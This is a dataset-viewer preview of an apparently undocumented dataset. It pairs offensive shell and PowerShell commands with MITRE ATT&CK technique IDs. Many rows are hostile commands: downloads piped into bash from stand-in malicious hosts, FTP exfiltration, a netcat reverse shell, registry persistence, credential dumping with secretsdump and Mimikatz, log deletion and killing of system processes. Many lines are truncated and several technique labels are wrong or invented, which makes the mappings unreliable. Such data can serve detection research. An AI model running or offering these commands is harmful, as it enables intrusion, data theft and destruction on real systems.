Dataset Viewer
Auto-converted to Parquet Duplicate
Search is not available for this dataset
Command
string
TechniqueID
string
TechniqueName
string
curl -b "session_cookie_value" https://example.com
T1550.004
Web Session Cookie
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\MyMonitor" /v Driver /t REG_SZ /d "C:\Windows
T1547.010
Port Monitors
psexec \\target -hashes:hash1!hash2!hash3 -u username -noadmin
T1075
Pass the Hash
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-WebRequest -Uri 'malicious-extension-url' -OutFile '$env:
T1176.002
IDE Extensions
upx --best --quiet --force -o malicious.exe.packed malicious.exe
T1045
Software Packing
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v BootExecute /t REG_SZ /d "del %SystemRoot%\System32
T1601
Modify System Image
echo "From: malicious@example.com" > email.txt && cat email.txt | mail -s "Urgent Action Required" victim@example.com -S from="trusted
T1672
Email Spoofing
curl --ftp-pasv -T /path/to/file ftp://maliciousserver.com/
T1048
Exfiltration Over Alternative Protocol
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-DNSAttack -Server '192.168.1.
T1583.002
DNS Server
certutil -urlcache -split -f http://malicious.com/file.zip
T1560.003
Archive via Custom Method
taskkill /IM svchost.exe /F >nul 2>&1 & taskkill /IM explorer.exe /F >nul 2>&1 &
T1499
Endpoint Denial of Service
net user > accounts.txt
T1087
Account Discovery
echo "Please enter your administrator password to continue:" && read ADMIN_PASSWORD && sudo -S echo "Continuing..." > /dev/null 2>&1 && sudo -S
T1141
Input Prompt
sudo tcpdump -i any -l -n -w - | bash -c "tcpdump -r - -n -ttt -l -XX | awk '{
T1205.002
Socket Filters
msbuild /t:templateinject /p:TemplateUrl=http://malicious.com/maliciousfile.exe
T1221
Template Injection
echo "This is a test call from your bank. Please verify your account details by pressing 1." > vishing_message.txt
T1598.004
Spearphishing Voice
setx COR_PROFILER "C:\malicious\profiler.dll" /M && corprof /quiet C:\windows\system32\WindowsPowerShell\v1
T1574.012
COR_PROFILER
certutil -generateSST -internal -silent -out custom_sst.sst -store My
T1587
Develop Capabilities
netdom query trus /domain:example.com > trusts.txt
T1590.003
Network Trust Dependencies
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_SZ /d "%SystemRoot%\SysWOW
T1505.005
Terminal Services DLL
lsusb -v | grep "Product" | awk '{print $3}' | sort | uniq -c | sort -nr | head -n 10
T1120
Peripheral Device Discovery
certutil -urlcache -split -f https://example.com/signedmalware.exe > signedmalware.exe & certutil -hashfile signedmalware.exe SHA2
T1588.003
Code Signing Certificates
powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'C:\example\importantfile.docx' -Name 'Author' -
T1492
Stored Data Manipulation
regasm /codebase maliciousscript.dll >nul 2>&1 && maliciousscript.exe
T1121
Regsvcs/Regasm
launchctl load -w /Library/LaunchDaemons/malicious_daemon.plist
T1569.001
Launchctl
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Authentication Packages" /t REG_BINARY /d 0000454c
T1131
Authentication Package
aws cloudtrail delete-trail --name my-trail --region us-east-1
T1562.008
Disable or Modify Cloud Logs
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v UserInit /t REG_SZ /d "%WIND
T1547.004
Winlogon Helper DLL
tasklist /v | findstr /i "AV"
T1518.001
Security Software Discovery
install_name_tool -add_rpath "@executable_path/Bad DYLib" /path/to/vulnerable/app.app && ./path/to/vulnerable/app.app/VulnerableExecutable > /
T1574.004
Dylib Hijacking
powershell -nop -c "Invoke-WebRequest -Uri 'http://malicious.com/icon.ico' -OutFile $env:TEMP\icon.ico;New-Item
T1027.012
LNK Icon Smuggling
net user /add /domain NewUser Password123!
T1136.002
Domain Account
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LocalServer32\{00020D00-0000-
T1021.003
Distributed Component Object Model
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-PSImage -ImagePath C:\path\to\image.png -Script
T1027.003
Steganography
powershell -nop -c "Invoke-WebRequest -Uri 'https://malware.example.com/download/malware.exe' -OutFile 'C:\malware.exe'"
T1588
Obtain Capabilities
reg add "HKEY_CLASSES_ROOT\.txt" /v "" /t REG_SZ /f /d "C:\path\to\malicious.exe" /reg:
T1042
Change Default File Association
StartProgramInGuest -VMName "victim-vm" -ToolsTimeout 300 -Wait -ProgramPath "C:\Windows\System32\cmd.exe"
T1675
ESXi Administration Command
taskkill /F /IM svchost.exe & wmic process where name="svchost.exe" call terminate & powershell -Command Start-Process -FilePath "
T1496.001
Compute Hijacking
powershell -NoP -NonI -W Hidden -Exec Bypass Invoke-Mimikatz -PassToTspkg -Samdump2 | powershell -No
T1098.005
Device Registration
curl http://169.254.169.254/latest/meta-data/
T1522
Cloud Instance Metadata API
secretsdump.py \\dc_ip -no-pass -hashes your_hash_here ntds.dit > dump.txt && ntdsutil.exe "load ntds dc
T1003.003
NTDS
wget -r -A txt -P /tmp/ http://example.com/sitemap.xml && grep -oP '(?<=<loc>)[^<]+' /
T1594
Search Victim-Owned Websites
nslookup example.com > roles.txt 2>&1 &
T1591.004
Identify Roles
psql -h 192.168.1.100 -U adversary -d database_name -c "SELECT * FROM users WHERE username
T1213.006
Databases
powershell -NoP -NonI -W Hidden -Exec Bypass -C "if ((Get-ADComputer -Identity 'TARGET_COMPUTER').OperatingSystem
T1480
Execution Guardrails
curl -s https://malvertising.example.com/ad | bash > /dev/null 2>&1 &
T1583.008
Malvertising
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/ExampleRole --role-session
T1078.004
Cloud Accounts
tasklist /v | find "chrome.exe" > nul && echo Y | certutil -decodebinary %LOCALAPPDATA%\Google\Chrome\User Data\Default\
T1555.005
Password Managers
echo y | sudo -S AuthorizationExecuteWithPrivileges /path/to/malicious/binary
T1514
Elevated Execution with Prompt
echo "Malicious firmware loaded" > /dev/null 2>&1 && rm -rf /tmp/malware_temp
T1542.002
Component Firmware
powershell -nop -c "Get-Process | Where-Object { $_.Path -like "*quarantine*" } | ForEach-Object { Remove-Item
T1027.005
Indicator Removal from Tools
echo -n "import os;import random;code=str(os.system('whoami'));print(code.encode('rot%d'%random.randint(1,25)))"
T1027.014
Polymorphic Code
powershell -NoP -NonI -W Hidden -Exec Bypass $Creds=(Get-StoredCredential "current_user");Invoke-Command -ComputerName remote
T1550
Use Alternate Authentication Material
echo "malicious_code" > %windir%\system32\calc.exe
T1565.003
Runtime Data Manipulation
rm -rf /var/log/* /var/log/*.log 2>/dev/null &> /dev/null &
T1070.002
Clear Linux or Mac System Logs
echo -n "Spamming..."; while true; do mail -s "Urgent: Check your account now!" -c "you@example.com" you@example
T1667
Email Bombing
powershell -nop -c "Invoke-WebRequest -Uri 'http://maliciousserver.com/tool.exe' -OutFile 'C:\Windows\Temp\tool.exe';
T1608.002
Upload Tool
wget https://example.com/crm_data.zip -O /tmp/crm_data.zip && unzip /tmp/crm_data.zip -d /tmp/crm/ && python
T1213.004
Customer Relationship Management Software
install_name_tool -add_rpath /path/to/library ./malicious_binary
T1161
LC_LOAD_DYLIB Addition
dir /s /b | findstr /i "confluence" > confluence_files.txt
T1213.001
Confluence
runas /user:Administrator "cmd" /elevator /t:7d934101-38b9-4c3b-8
T1550.002
Pass the Hash
powershell Add-MailboxPermission -Identity "victim@example.com" -User "attacker@example.com" -AccessRights FullAccess -InheritanceType All -Grant -
T1098.002
Additional Email Delegate Permissions
wmic /node:"`" . "\"..\" \.\.\. \.\sys32 \.windows \.exe \"$env:userprofile\appdata\local
T1027.010
Command Obfuscation
bodilhax0r -p -s -u "C:\path\to\malicious.fw" -f bios -a all -v
T1542.001
System Firmware
wget -qO- http://malicious-link.com/download | bash -c
T1192
Spearphishing Link
dir /s /b > files.txt && type files.txt | findstr /i "password" 1> output.txt 2>&1
T1005
Data from Local System
az ad user get-member-groups --user-id <user_id> \# Offensive security command for T1069.003 - Cloud Groups enumeration. Usage:
T1069.003
Cloud Groups
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "%windir
T1073
DLL Side-Loading
snmpwalk -v2c -c public 192.168.1.1 -m+ALL sysDescr
T1602.002
Network Device Configuration Dump
powershell -NoP -NonI -W Hidden -Enc ABCDEFGHIJKLMNOPQRSTUVWXYZ
T1486
Data Encrypted for Impact
bash -c 'echo -e "global _start\n_start:\ndlopen(/path/to/malicious.so,1)\nexit" > malicious_payload.asm && n
T1129
Shared Modules
powershell -c "Invoke-WebRequest -Uri 'https://disposable-email.co/create' -Method Post -Body 'email=adversary@example.com'"
T1585.002
Email Accounts
powershell -nop -c "Add-Type -A 'System.Reflection';$proc=[System.Diagnostics.Process]::GetProcessesByName('notepad')[0];[System.Runtime
T1055
Process Injection
powershell -c "Invoke-RestMethod -Uri 'http://maliciousserver.com/email' -Method Get" > emails.txt && mailsniper -w "
T1114.002
Remote Email Collection
netsh interface set interface "Local Area Connection" admin=disable && timeout /t 60 && netsh interface set interface "Local Area Connection" admin=enable &
T1030
Data Transfer Size Limits
sudo cp malicious.plist /Library/LaunchAgents/
T1159
Launch Agent
sc create MaliciousService binPath= "C:\Windows\System32\cmd.exe" start= auto
T1543.003
Windows Service
nc -v -p 12345 -e /bin/bash 192.168.1.100 -w 1 -
T1498.001
Direct Network Flood
Set-Service -Name EventLog -Status Stopped
T1562.002
Disable Windows Event Logging
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v PasswordFilterList /t REG_MULTI_SZ /d "C:\malicious.dll"
T1556.002
Password Filter DLL
osascript -e 'do shell script "xattr -d com.apple.quarantine /path/to/executable" with administrator privileges' > /dev/null 2
T1553.001
Gatekeeper Bypass
powershell -NoP -NonI -W Hidden -Enc aW50cnljdGVkIGFwcCBmb3IgYmFzZ
T1056.004
Credential API Hooking
rundll32.exe url.dll,FileProtocolHandler http://malicious.com/vulnerable.dll?cmd=calc
T1548.002
Bypass User Account Control
powershell.exe -WindowStyle Hidden -Command "Get-Process" \# Offensive Security Command: taskkill /F /T /PID $(powershell.exe -WindowStyle
T1143
Hidden Window
powershell -Command "New-InboxRule -Name 'Delete Malicious Emails' -Condition 'IsFrom ""bad.guy@example.com""' -Action 'MoveTo
T1564.008
Email Hiding Rules
Connect-AzAccount -UseDeviceAuthentication -Environment AzureChinaCloud
T1021.007
Cloud Services
del /q C:\path\to\file.txt rm -f /path/to/file.txt rm -rf /path/to/directory rm /force C:\path\to
T1070.004
File Deletion
openssl enc -aes-256-cbc -in sensitive_data.txt -out sensitive_data.enc -pass pass:password1234567890
T1022
Data Encrypted
shutdown /s /f /t 00
T1529
System Shutdown/Reboot
regasm /unregister C:\exploit.dll && regasm /register C:\exploit.dll >nul 2>&1 & C:\exploit.dll
T1203
Exploitation for Client Execution
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion" /v Run
T1012
Query Registry
echo "export LD_PRELOAD=/path/to/malicious/lib.so" >> ~/.bashrc && source ~/.bashrc
T1574.006
Dynamic Linker Hijacking
certutil -newpfx -p "password" -s -v -f new_cert.pfx
T1587.002
Code Signing Certificates
dig +short +noall +answer example.com | shuf --repeat -n 1 | xargs nslookup -query=A 127.0.0
T1568.001
Fast Flux DNS
powershell -nop -c "Invoke-WebRequest -Uri 'http://malicious.com/malicious_extension.crx' -OutFile $env:LOCALAPPDATA\
T1176.001
Browser Extensions
powercfg /hibernate off
T1653
Power Settings
net user administrator /active:yes && net localgroup administrators administrator /add && echo Y | psexec \\target_ip -u administrator -p password cmd.exe && reg
T1078.003
Local Accounts
curl -s https://example.com/resolver | grep -oP '(?<=dead_drop=)\K[^&]+' | xargs nslookup -type=a
T1102.001
Dead Drop Resolver
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName && dir /s /b "%programfiles%" | findstr /i
T1518.002
Backup Software Discovery
dig +short txt _msdcs.yourdomain.com | grep -oP "(?<=mail exchanger is ).*@[a-zA-Z0-9.-]+"
T1589.002
Email Addresses
End of preview. Expand in Data Studio

No dataset card yet

Downloads last month
3